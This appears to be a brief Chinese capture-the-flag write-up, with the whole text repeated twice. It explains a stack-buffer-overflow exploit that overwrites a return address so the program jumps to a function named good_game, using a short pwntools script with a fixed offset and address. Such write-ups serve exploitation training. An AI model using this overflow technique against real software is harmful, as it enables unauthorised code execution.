我先checksec一下
可以栈溢出,发现主函数里的read函数就可以溢出
我们可以看到函数列表里还有个函数叫good_game
那直接覆盖然会地址就好啦
上脚本
#函数主体
cn.recvuntil("Input your message:\n")
goodgame_addr=0x00400620
payload='a'*(0x88)+p64(goodgame_addr)
cn.sendline(payload)
cn.interactive()
我先checksec一下
可以栈溢出,发现主函数里的read函数就可以溢出
我们可以看到函数列表里还有个函数叫good_game
那直接覆盖然会地址就好啦
上脚本
#函数主体
cn.recvuntil("Input your message:\n")
goodgame_addr=0x00400620
payload='a'*(0x88)+p64(goodgame_addr)
cn.sendline(payload)
cn.interactive()